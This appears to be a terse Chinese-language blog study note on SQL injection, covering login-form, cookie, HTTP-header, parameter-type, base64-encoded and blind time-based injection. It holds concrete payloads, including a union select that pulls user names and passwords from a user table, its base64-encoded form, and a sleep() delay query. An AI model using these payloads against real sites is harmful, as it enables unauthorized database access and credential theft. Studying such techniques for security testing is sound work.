POST登录框注入
可以将注入代码写入输入框
COOKIE验证注入
(burp抓包)
HTTP头注入
实际情况下,有部分站点接受数据是以http数据包中的http头部进去的数据接受,所以测试注入需要在头进行注入
参数类型注入
数字,字符,搜索型
数字型:
id = 1
字符:
id = ‘admin’ //单引号的处理
搜索型:
id like ‘%admin%’
组合:id = admin%’ union select 1,2 ‘%
参数加解密注入
base64
假设源码:$id=base64_decode($_GET['x']);
转换之后 1 的base64为 MQ==
加密注入,需要将注入代码通过base64加后注入
1 union select userName,2,3,userPwd,5,6,7,8 from xss.oc_user # base64加密后 MSB1bmlvbiBzZWxlY3QgdXNlck5hbWUsMiwzLHVzZXJQd2QsNSw2LDcsOCBmcm9tIHhzcy5vY191c2Vy
- 盲注攻击
普通联合注入和盲注区别
pt:效率高,兼容差
盲注:效率较低,兼容性强
工具采用的基本为盲注
盲注通过if + >或< 二分法提高效率
–基于时间的延迟注入(上)
- sleep()
select * from users where user_id=1 and sleep(1);
感谢您的来访,获取更多精彩文章请收藏本站。
© 版权声明
THE END
暂无评论内容